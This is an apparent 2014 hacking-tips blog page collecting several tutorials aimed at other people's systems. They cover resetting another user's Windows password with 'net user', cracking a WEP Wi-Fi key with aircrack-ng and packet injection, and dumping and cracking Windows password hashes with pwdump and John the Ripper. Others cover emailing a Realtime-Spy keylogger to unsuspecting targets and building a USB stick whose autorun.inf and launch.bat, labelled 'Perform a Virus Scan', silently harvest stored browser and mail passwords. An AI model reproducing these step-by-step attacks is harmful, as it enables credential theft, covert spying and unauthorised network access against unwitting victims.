Thursday 29 May 2014

// // 1 comment

How to Hack Into a Windows User Account Using the Net User Command

Are you sick of trying to work out someone's password to their Windows account? Well, follow these easy steps to learn how to hack into their account. Be aware that this hack only works if you are an Administrator. You could also use this technique if you forget your password.

Note: You must already have been granted access (logged in) to Windows before beginning this task.

 

 

Steps

  1. Hack Into a Windows User Account Using the Net User Command Step 1.jpg

    1
    Go to "Run" on the start menu. (or press Win+R, windows key and letter R)
  2. Hack Into a Windows User Account Using the Net User Command Step 2.jpg
    2
    Once on "Run", Type "cmd" into the text box.
  3. Hack Into a Windows User Account Using the Net User Command Step 3.jpg
    3
    "Command Prompt" should pop up. It helps to maximize the window so it will be bigger.
  4. Hack Into a Windows User Account Using the Net User Command Step 4.jpg
    4
     
  5. Then type net user {Username} * where {Username} represents the username you want to hack, and press ENTER.
  6. Hack Into a Windows User Account Using the Net User Command Step 5.jpg
    5
    Now you are allowed to fill in a password, you can't see your typing but it is there, so make sure you spell right. Press ENTER two times to delete the password on the account so that the account doesn't have a password.
  7. Hack Into a Windows User Account Using the Net User Command Step 6.jpg
    6
    Log out and log back in with the hacked account
  8. Hack Into a Windows User Account Using the Net User Command Step 7.jpg
    7
    The whole instruction, with John as account name is: net user john *

With a batch file

  1. Hack Into a Windows User Account Using the Net User Command Step 8.jpg
    1
    Use this if you haven't got access to command prompt, but you do to notepad. (works only if command prompt isn't switched off!, only blocked from starting through regular shortcuts)
  2. Hack Into a Windows User Account Using the Net User Command Step 9.jpg
    2
    Open up notepad and type:

    @echo off
    net user {username} *Again, replacing {username} with the username which you want to hack.
  3. Hack Into a Windows User Account Using the Net User Command Step 10.jpg
    3
    Below where you enter the name for your file, change the field (drop-down box) to "all files" instead of text (.txt) files and save it as "name.bat" (batch file), in this case the title of the file doesn't matter as long as it ends with a .bat extension.
  4. Hack Into a Windows User Account Using the Net User Command Step 11.jpg
    4
    When you double click the .bat file (open/execute) it a command prompt screen should open and ask you to enter a new password.
Read More
// // Leave a Comment

Finding Ip Address Of A Website Using Command Prompt Or CMD

In this tutorial i will teach you to find Ip Address of any website using Command Prompt or in short CMD. Using IP Address you can find location of the website server and do more stuff. I will demostrate this tutorial with Google but you can use this method to find IP Address of any website like twitter, facebook etc. So lets get started.

How to find IP ?

1. Go to Start > Type CMD and press Enter.
2. Now write Ping followed by website URL whose IP you want to find.
finding ip adddress of website
3. It will take less then a second and come up with the results as shown below.
finding ip adddress of website

In  my next post i will show you another easy way to find website IP Address and teach you to use this IP to find its location.
Read More
// // Leave a Comment

How To Lock Folder ?...Without Any Software

How To Lock Folder ?

   1. Open Notepad and Copy code given below into it.
cls
@ECHO OFF
title coolhacking-tricks.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK

ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== veer goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End
   
   2. Save the notepad file as lock.bat (.bat is must)
   3. Now double click on lock.bat and a new folder will be created with name MyFolder
   4. Copy all your data you want to protect in that New folder
   5. Now double click on lock.bat and when command promp appears Type Y and press enter.
   6. Now MyFolder will be hidden from you view, to access that folde double click on lock.bat
   7. It will ask for password enter your password and done. (Default password is veer)
  • To change the password replace veer with  new password in the above code
Read More

Tuesday 27 May 2014

// // 1 comment

Wifi Hack By Backtrack Part 2

In my previous article WiFi Hacking Part 1, i wrote about the necessary tools and stuff  that you require for WiFi Hacking .If you have not read the article, please go through it before reading this one

In this article i will explain how you can crack wireless network's WEP key using Backtrack in six easy steps

WiFi Hacking Part 2
I believe all my blog readers have read the previous article WiFi Hacking Part 1, and know what are the tools and stuff that you require for WiFi hacking

Commonly Used Terms :- 
  • WEP - Wired Equivalency Privacy, it is a security protocol for Wi-Fi networks
  • Access Point (AP)- A wireless router
  • MAC Address - Media Access Control address, a unique id assigned to wireless adapters and routers .It comes in hexadecimal format (ie 00:15:eR:21:a3:63)
  • BSSID - Access Point’s MAC address
  • ESSID - Access Point’s Broadcast name


Cracking WEP Using Backtrack


Step -1 Booting Backtrack

Boot your copy of Backtrack from your USB drive (refer my article on how to make a bootable Backtrack USB ),Once booted you will be prompted for the login details, enter usename as "root" and password as "toor", finally enter "startx " to start backtrack .Now once you have logged in, launch a new konsole terminal by clicking the konsole terminal icon which is there on the task bar .Now plug in your Wifi usb card and type in the following commands in the terminal as shown
ifconfig wlan0 up

where wlan0 is the name of the wireless card ,it can be different .To see all wireless cards connected to your system simply type" iwconfig "

Step -2 Putting your WiFi card on Monitor Mode

The purpose of this step is to put your card into what is called monitor mode. Monitor mode is the mode whereby your card can listen to every packet in the air ,It is similar to a Promiscuous mode which is used for packet sniffing in a LAN .You can put your card into Monitor mode by entering the following commands in a terminal
airmon-ng  start (your interface)

Example :- airmon-ng  start wlan0

Now a new interface mon0 or ath0 will be created , You can see the new interface is in monitor mode by entering "iwconfig" as shown


Step -3  Monitor the air for WiFI connections 


Now after putting the card in monitor mode you will need to monitor the air for available wireless networks (WiFi connections)around  you , For this you'll have to use a tool called "airodump" .

So you can start monitoring the air with airodump by enter the following commands
airodump-ng  mon0

where mon0 is the new interface which we created in the previous step
Bssid shows the mac address of the AP, CH shows the channel in which AP is broadcasted and Essid shows the name broadcasted by the AP, Cipher shows the encryption type ,

Stop the process by pressing  "ctrl +c " and select your target  ,Since i am only cracking WEP  i will take "johny" as my target from now on

Step -4 Capturing Data with Airodump 

Now to crack the WEP key you'll have to capture the targets data into a file, To do this we use airodump tool again, but with some additional switches to target a specific AP and channel. Most importantly, you should restrict monitoring to a single channel to speed up data collection, otherwise the wireless card has to alternate between all channels .You can restrict the capture by giving in the following commands
airodump-ng mon0 --bssid -c (channel ) -w (file name to save )
As my target is broadcasted in channel 2 and has bssid  "98:fc:11:c9:14:22" ,I give in the following commands and save the captured data as "johnywep"
airodump-ng   mon0 --bssid  98:fc:11:c9:14:22   -c 2  -w  johnywep
Do not close this terminal (run the other commends simultaneously in an another terminal)


Step -5 Using Aireplay to Speed up the cracking  

You will have to capture at least 25,000 data packets to crack WEP .This can be done in two ways, The first one would be a (passive attack ) wait for a client to connect to the AP and then start capturing the data packets but this method is very slow, it can take days or even weeks to capture that many data packets

The second method would be an (active attack )this method is fast and only takes minutes to generate and inject that many packets .

In an active attack  you'll have do a Fake authentication (connect) with the  AP ,then you'll have to generate and inject data packets.This can be done very easily by using a tool called "aireplay"

So you can do a Fake authentication with the AP using aireplay by entering the following commands in a new terminal
aireplay-ng - 1  3  -a (bssid fo the target )  (interface)

In my case i enter the following

aireplay-ng -1 3  -a 98:fc:11:c9:14:22 mon0 

After doing a fake auth ,now its time to generate and inject Arp (data )packets . To this you'll have to open a terminal simultaneously and enter the following commands
aireplay-ng 3  -b (bssid of target)  -h ( address of your card (mon0))   (interface)

In my case i enter
aireplay-ng 3  -b 98:fc:11:c9:14:22   -h 00:c0:ca:50:f8:32 mon0
If this step was successful  you'll see Lot of data packets in the airodump capture ( step 4  ) as shown


Wait till it reaches at least 25000 packets , best would be to wait till it reaches around 80,000 to 90,000 packets .Its simple more the data packets  less the time to crack .once you captured enough number of packets, close all the process's by pressing "Ctrl +c" or by simply clicking the into mark which is there on the terminal

Strep -6 Cracking WEP  key using Aircrack 

Now its time crack the WEP key from the captured data, we use Aircrack to achieve this

Enter the following commands to crack the WEP key
aircrack-ng  (name of the captured file (step 4) )

In my case i enter 

aircrack-ng johnywep-0.1-cap
With in a few minutes Aircrak will crack the WEP key as shown


Voila you have successfully  cracked the WEP key in Six simple steps

Read More
// // Leave a Comment

Unlocking your data card easy

  Unlocking your data card easy


  • DC-unlocker is a program specialized for data card unlocking.
  • It is the first universal data card unlocking product worldwide.
  • It is fast ( takes 5 - 60 seconds to unlock), easy to use and functional program with clear interface.
  • It doesn't need any cables or adapters for unlocking. The data card can be simply unlocked in the same notebook where a PCMCIA or Express socket exists.
  • New models are being added regularly.
  • No need to select any COM ports, auto detect function.
  • Free updates.
 

                                         1.          VCell.3G.Data.Connection.Manager



 http://dl.mymodem.in/BSNLLW272UNL#
Read More
// // Leave a Comment

Windows Unsolved Mysteries...........

s.  Iyou all like this article .
  Here are some of the unsolved mysterious things  involving the worlds most used
  OS "Windows" .One day i got a mail stating that......


Nobody can create a FOLDER anywhere on the computer which can be named as “CON”.This is something pretty cool…and unbelievable… At Microsoft the whole Team, including  Bill  Gates, couldn’t answer why this happened!
 TRY IT NOW !!
                                                                                

This is not the first time I listen about this funny question that "why we can't create a folder with name 'CON' , and I’m sure most of  you also try to make folder "CON" just now after reading the title of article  ! if no,then go and 1st try it .... If you try creating a folder named CON, as the mail claims, it’ll get renamed automatically to New Folder. But there is no mystery behind this, and the team at Microsoft very well knows the reason for this. :-)

Why is it not possible to create a folder named CON ?

Before we proceed further, let me tell you a small secret you can’t even create a folder named PRN, AUX, NUL and many others.

The reason you can’t create a folder with these names is because these are reserved keywords used by DOS. The below screen-shot taken from Microsoft’s website shows a list of reserved keywords in DOS.


If you try creating a folder with any of these names, the name automatically changes back to the default “New Folder”. And this is what has caused the confusion. Instead of automatically renaming the folder, had an explanatory warning message popped up.
 

Here are  Some of the Other Mysteries

1.Go to notepad and type Bush hid the facts. After which, save your work anywhere
   with any name and close  notepad. Then re-open notepad and open your previously
   saved file and look what appears.

2.Open Microsoft Word then type: =rand (200, 99) and press ENTER. By now
  I bet you’re seeing something strange that not even Bill Gates and his team can explain.




                               Bush trying these things… haha


 Are these things telling us something, or are they just bugs of the old tycoon named Windows?



Read More
// // Leave a Comment

Password Cracker 1.1 - Download

One of  my blogging  friends (Black star) has developed password cracking tool. Password Cracker 1.1 .This tool can crack  MD5,SHA-1,.. Hash codes using Dictionary Attack Method. Password Cracker 1.1 is open source (free) , you can download the tool from the following link 




Download :-


For windows Users :-
Download the Password Cracker 1.1 from Here
Open the HashCodeCracker.exe which is inside the folder .



Note :- You need JRE (Java run time Environment) to run this .If you don't have it, Download it from Oracle.com


For Linux Users 
Download the HashCodeCracke.zip file from Here
Extract the zip file, Open a new  Terminal. Navigate to the path of Extracted zip file, Type this command "java -jar HashCodeCracker.jar".Now the application will run.


How To Use Password Cracker 1.1 


1. First download the tool from the above link , then run the application ( Password Cracker 1.1 )


2. Now Select  the Input case type 
There are 3 options ., select one of them
  • Default          - As it is in the dictionary file
  • Upper case   -  Change the dictionary file input to upper case
  • Lower case   - Change the dictionary file input to lower case

3. Now Select Other type option as shown 
There are 3 options ..select one of them  

Reverse Input:  Reverse the dictionary file input.  
Example :- Let us assume the dictionary file contains the following inputs: passi loveyou. if you choose reverse input , it will reverse like this : "ssap","uoyevoli".

Double: Just doubles the input.
Example :- If the input is " pass " then it simply doubles it as "passpass"


Numbers at the End: Add numbers from 0 to 99. 
Example :- pass0,pass1,pass2....pass99.

4. Now paste the hash code and Select the Hash method (MD5,MD4,SHA-1,SHA-128,SHA-256,SHA-512).


5. Select a dictionary file and and click the "Crack the Hash " button.




Wait for a some time, it will return you with the password. If the hash is not cracked, then try to changing the   "other type" and "Input Case type".

Pros :- Very easy to use , Has a nice GUI (Graphical user interface ) , available for both windows and Linux platforms

Cons :- Very slow to crack , It only uses dictionary attack to crack passwords 


Read More
// // Leave a Comment

Hack Windows Password Using Pwdump and John The Ripper



I have already written articles on How you can hack windows passwords Using various tools such as Ophcrack ,Chntpw and i have also written  an article on how to hack windows password using stick keys . In this article i will explain an another way to Hack/crack windows password using  Pwdump and John the ripper

Hack Windows Password Using Pwdump and John The Ripper 



Things we need :-

1. Pwdump - To dump windows password hashes
2. John the Ripper - To crack the dumped password hashes





Procedure:-


1.  Open My computer and go to C:\Windows\system32 ,now place the Pwdump file which we download earlier

2. Now open command prompt and navigate to C:\Windows\system32 \Pwdump By Using the "cd " command  and  click enter

Example :-
Cd C:\Windows\system32 \Pwdump

3. Now you can see a list of Pwdump commands as shown


4. Now enter pwdump - localhost >>“ destination of the output file “ (for 32-bit computers) and pwdump -x localhost >> “destination of the out put file “(for 64- bit computers )


Example :-
Cd C:\Windows\system32 \Pwdump localhost >> C:\hash.txt (for 32-bit computers )


Cd C:\Windows\system32 \Pwdump -x localhost >> C:\hash.txt (for 64-bit computers)




5. Now open  the Out put  file (In my case its hash.txt )From c:/ you can see the names of the different  users with password hashes Now copy the hashes  corresponding to the admin account

6. Now make JTR (John the ripper ) crackable file by Opening a notepad and pasting the hashes which we copied in the previous step in the format given below
Example:-
User:gyuJo098KkLy9
where "gyuJo098KkLy9" is the  hash which we copied in the 5th step 

7. Save the file as crackme.txt (just an example) and go to the prompt and type 'john crackme.txt' (with out quotes ). Now wait for a while ,the password hashes will be cracked  .You can also use the Various options in John the ripper to make the cracking a little faster .
For this you can refer my Tutorial on John the Ripper 
Posted By Veersoni And Anil Hacker
Read More
// // Leave a Comment

John The Ripper -Tutorial veersoni2010.blogspot.com


 John the Ripper  is probably the fastest, most versatile, and definitely one of the most popular password crackers available. It supports six different password hashing schemes that cover various flavors of Unix and the Windows LANMan hashes also known as NTLM (used by NT, 2000, and XP). It can use specialized wordlists or password rules based on character type and placement.

I got many Emails from my blog readers requesting me to write an article on how to use john the ripper ,But  actually there are may nice tuts on the net on this subject . So i taught instead of writing i can share one such article  The following article is written by  Renegade

 veersoni2010.blogspot.com




 





John The Ripper Tutorial

I wrote this tutorial as best I could to try to explain to the newbie how to operate JTR. Remember, this is a newbie tutorial, so I wont go into detail with all of the features. JTR is a program that decyrpts Unix passwords using DES (Data Encryption Standard).


The Process 


Step 1: Download JTR.

Step 2: Extract JTR. In windows use winzip. In unix type tar -xzf john-1.6.tar.gz

Step 3: In windows open the command prompt. Go to the Start menu, click Run, type 'command' (no quotes) and press enter.

You with me? Good. Go to whatever directory to have JTR in. Type 'john' and press enter. A whole list of options will come up:

John the Ripper Version 1.6 Copyright (c) 1996-98 by Solar Designer


Usage: /WINDOWS/DESKTOP/JTR/JOHN-16/RUN/john [OPTIONS] [PASSWORD-FILES]
-single "single crack" mode
-wordfile:FILE -stdin wordlist mode, read words from FILE or stdin
-rules enable rules for wordlist mode
-incremental[:MODE] incremental mode [using section MODE]
-external:MODE external mode or word filter
-stdout[:LENGTH] no cracking, just write words to stdout
-restore[:FILE] restore an interrupted session [from FILE]
-session:FILE set session file name to FILE
-status[:FILE] print status of a session [from FILE]
-makechars:FILE make a charset, FILE will be overwritten
-show show cracked passwords
-test perform a benchmark
-users:[-]LOGIN|UID[,..] load this (these) user(s) only
-groups:[-]GID[,..] load users of this (these) group(s) only
-shells:[-]SHELL[,..] load users with this (these) shell(s) only
-salts:[-]COUNT load salts with at least COUNT passwords only
-format:NAME force ciphertext format NAME
(DES/BSDI/MD5/BF/AFS/LM)
-savemem:LEVEL enable memory saving, at LEVEL 1..3
You wont need most of these options. In fact, you don't really need any of these options. You can simply type 'john [filename]'. The filename must include the .txt extension. This is the regular crack. It will use bruteforce to decrypt all of the passwords in the file. If you're an impatient ass you can use a word list. This is not as effective but it's quicker (more on that later).


How to make a crackable file: Let's say that for some reason you have a DES encrypted password but no file. If you want to crack it (why else would you be here?) you need to make your own file. Just create a text file and paste in the password. Now put a username (just any old name will do) in front of it with a colon separating the two. It should look something like this:
User:gyuJo098KkLy9

Save the file as crackme.txt (just an example) and go to the prompt and type 'john crackme.txt' (no quotes obviously). Now you just have to wait.

Options
Here are a list of the options and what they do.

single: Single crack mode. This is only recommended for weak passwords as it includes only a few rules and a small wordlist.
Usage: john -single crackme.txt

wordfile: Uses a wordlist (basically a dictionary attack). What this does is tries every word in the list until it finds a match or you reach the end of the list. This is quicker than the default (bruteforce) attack, but I don't recommend this because it doesn't always find a match. More notes on wordlists below.
Usage: john -wordfile:password.lst crackme.txt

rules: Lets you define the rules for using wordlists. I don't use wordlists, so if you want to use this option I wont help you. Ok, ok, I'm just lazy. Shoot me.

incremental: I like this method. It allows you to do a bruteforce attack
under certain modes.
Usage: john -incremental:alpha crackme.txt (only letters)
       john -incremental:digits crackme.txt (only numbers)
       john -incremental:lanman crackme.txt (letters, numbers, and some special characters)
       john -incremental:all crackme.txt (all characters)

external: This is a little complicated, so if you are lame don't mess with it. Basically this calls the options that are defined in the configuration settings. You can change these yourself, but I wouldn't recommend it unless you know what you're doing. No, I wont tell you how, go away.
Usage: john -external:[MODE] crackme.txt (replace MODE with whatever the
name of your mode is).

restore: Ok, let's say that you need to stop the crack in the middle. Press crtl+break. A file will be created in the JTR directory named 'restore' (no quotes doofus, and yes, no file extentionfilename.
Usage: john -restore:restore

session: Use this if you know that you will have to stop JTR in the middle of a crack. It allows you to create a new file that holds the data of your session. You can then restore your session later.
Usage: john -session:[save to filename] crackme.txt

status: Shows how far you got before stoping a crack (provided you used the -session option).
Usage: john -status:[filename]

show: Shows how many passwords have been cracked in a file and how many are left.
Usage: john -show crackme.txt

test: Shows how fast JTR will work on your computer.
Usage: john -test

users: Cracks the password only for the user or users you tell it to.
Usage: john -users:User crackme.txt

groups: Cracks the passwords only for the group or groups you tell it to.
Usage: john -group:lamers crackme.txt

shells: Cracks the passwords only for the shell or shells you tell it to.
Usage: john -shells:shelly crackme.txt

salts: Cracks the salts that have at least the number of passwords you specify.
Usage: john -salts:2 crackme.txt

format: JTR can decrypt many from many different formats, not just DES (but this is the most widely used one). Use this to force JTR to try a certain format.
Usage: john -format:DES crackme.txt (force DES)
       john -format:BSDI crackme.txt (force BSDI)
       john -format:MD5 crackme.txt (force MD5)
       john -format:BF crackme.txt (force BF)
       john -format:AFS crackme.txt (force AFS)
       john -format:LM crackme.txt (force LM)
savemem: this tells JTR to automatically save your process at whatever
level you specify from one to three.
Usage: john -savemem:1 crackme.txt (save at level 1)
       john -savemem:2 crackme.txt (save at level 2)
       john -savemem:3 crackme.txt (save at level 3)
How to use a wordlist with JTR: I'll assume you already have a wordlist in the JTR directory (it comes with password.lst, if you want to make your own I'll tell you how later). Go to the prompt and type 'john -wordfile:password.lst crackme.txt' (no quotes, damnit). If the password is in the wordlist, it will work. Otherwise, you deserve it for using a wordlist when you have bruteforce capabilities, shame on you.

How to create a wordlist to use with JTR: First I will include a few lines of the wordlist supplied with JTR:
#!comment: Common passwords, compiled by Solar Designer.
12345
abc123
password
passwd
123456

The top line is a comment (duh). If you want to make a comment in your wordlist just follow the example. The other lines are passwords that the program will try when you use the wordlist. Put each password on a new line. In the event that you are too lazy to write your own wordlist you can download one (once again, I'm far too lazy to give you a link). It may or may not already be the right file format (.lst). If it isn't, just go to the prompt. Assuming the filename is lazy.txt, type 'rename lazy.txt lazy.lst'

Piping Output: Remember the -show option? You can get JTR to save that
output to a file. Just type 'john -show crackme.txt > crackinfo.txt'

There's my guide. I have an FAQ below:

Q: Can I mix options?
A: Yes, certain options can be mixed. You can mix options as long asthey don't clash. Play around with it a while.

Q: What does "Loaded 0 passwords" mean?
A: There was a problem with either your password file or the syntax of your command. If you force BF decryption when your file has DES encryption it wont work. If your password file isn't made right it wont work.

Q: What does "Password files required, but none specified" mean?
A: Can you read? You can't just tell JTR to crack, you need to give it a file.

Q: What does "Unknown cyphertext format name requested" mean?
A: When you use the -format option you need to check that you typed the name of the format correctly.

Q: How come when I typed 'john -users: login|uid crackme.txt' (which by the way is the usage shown in the list of option by JTR) I received this error:
Option requires a parameter: "-users:"
Bad command or file name
A: The piping symbol you used (|) can mean two different things. In this case in means 'or'. You're supposed to use login OR uid. When you type it in a dos window, you are running two separate commands.

Q: Can I speed up the bruteforce?
A: Sure, just toss that old ass box of yours and get a new one.
Source - osix.net

Read More
// // Leave a Comment

Hack a Remote Computer Using Realtime Spy...............

In one of my previous tutorials we discussed how we can use ardamax key logger to hack remote computers .In this article i will explain What is Realtime spy and i will also explain How you can use  Real time spy to hack remote computers


What is Real time Spy ?
Realtime-Spy is the latest in cutting-edge remote spy software monitoring technology that allows you to monitor ANY PC you own from ANYWHERE. Realtime-Spy is remotely installable .It is one of the best and the Cheapest spying softwares which is out there in the market



Why Realtime spy ?
So now you will ask me, why i should use Realtime spy ? If i can do the same using Ardamax keylogger for a free of cost .The answer is going to be very simple ,In Ardamax keylogger there are only few features that you can use to monitor remote computers , It can be easily found by using Antivirus programs and moreover it needs physical access for instillation


But in Realtime spy  no physical installation is  needed .It also has some excellent features like its activity logs are accessible from anywhere regardless if the remote PC is online or not , Realtime-Spy logs all keystrokes, websites visited, applications ran, e-mail activity, chat conversations, screenshots, and many more
Its stealth (i.e) it's totally undetectable by anti viruses.The best feature i like in Realtime-Spy is it can show you what users are doing, and typing, in real-time. So overall ardamax keylooger is no comprision to Realtime-Spy 


Hack a Remote Computer Using Realtime Spy  :-
Step 1 :-

First a fall Download Realtime-Spy from Here. After downloading your copy of Realtime-Spy navigate to where you downloaded (in this case it is on the Windows desktop). Double click the Realtime-Spy installer file to start the install.


NOTE: After install is complete you can delete this file!




Step 2:-
Upon finishing the installation you will be able to run Realtime-Spy's configuration file immediately. Do this and continue to the next step.



Step 3 :-
You will now see the Realtime-Spy configuration window. Enter in your username and password that you received after purchasing Realtime-Spy. These must be entered EXACTLY as given. They are case sensitive, and take care not to mix up 0's with O's and I's with l's.

After you enter your username and password, choose whether or not you want Realtime-Spy to display a splash warning whenever it is ran, and how often you want it to clear its logs.

After you enter your username/password and select the options you want - press "next" to go to the next configuration panel.



Step 4 :-
When you click "next" Realtime-Spy will verify your settings. If they are correct you will be able to configure your monitoring options, as shown below. Once you have your options set click "create" to create your logging module.



Step 5 :-
Click "create" to create your logging module. You will be prompted for a name to give the file you are creating. In this example we have named it 'test' - you can name it whatever you want. Click Save and you will receive a message similar to the one below.

Remember the location of the file you have just created!





Step 6 :-
Now it is time to send out the file to the remote PC. In this guide we are using Outlook Express on Windows XP.

Click the Create Mail button to open a new mail window.


Step 7 :-
Click ATTACH and navigate to where you saved your Realtime-Spy file you created previously. Click on the file and then click 'Attach' to attach the file to your email.


Step 8 :-
You will now have to enter a recipient for the file you are sending, as well as an email subject and body. Notice the size of the Realtime-Spy file - it should be approximately 100-120kb at all times!

Once you are ready to go click Send to send the email!


Step 9 :-
Once you send out the file you can then login to your Realtime-Spy webspace. This is located at www.realtime-spy.com/mems/

Enter in your username/password at the prompt to continue!


Step 10 :-
You will be presented with your Realtime-Spy webspace. Here you can select and view users that were logged with the file you sent out.


Note: Users will only appear after they have downloaded and executed the file you have sent them.


If you have any doubts regarding the Installation . Please feel free to post a comment 

Read More
// // Leave a Comment

How to Hack Passwords Using An USB Drive Read more:

As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE ,chrome and Firefox. There exists many tools for recovering these passwords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff /hack passwords from any computer.





Things We Need
Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

ChromePass : It is a small password recovery tool for Windows that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry, the following information is displayed: Origin URL, Action URL, User Name Field, Password Field, User Name, Password, and Created Time. You can select one or more items and then save them into text/html/xml file or copy them to the clipboard.



Download

I have uploaded all  the Hacking tools in a single package click on the download button to download all the tools and to get the password click Here 


How to Hack Passwords Using An USB Drive
1. After downloading  all the tools, from the above link extract and copy all the executable(.exe files) which is inside the "USB pass hack" folder  into your USB- Pendrive.

2. Now open a Notepad and write the following text into it
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save the Notepad and rename it from New Text Document.txt to autorun.inf ,Now copy the autorun.inf file onto your USB pen drive.
3. Now open an another Notepad and copy  the following text onto it.
start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt
start ChromePass.exe /stext chrome.txt


Now save the file as launch.bat ,Copy the launch.bat file also to your USB drive.
Now your rootkit is ready and you are all set to sniff /hack the passwords. You can use this pen-drive on any computer to sniff the stored passwords. Just follow the steps given below

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
4. Remove the pendrive and you’ll see the stored passwords in the .TXT files. as  shown ,open the files to view the stored passwords
This hack works on Windows 2000, XP, Vista and Windows 7
NOTE: This procedure will only recover the stored passwords (if any) on the Computer.
If you have any doubts regarding the hack please pass your comments for further doubts and clarifications 

Read More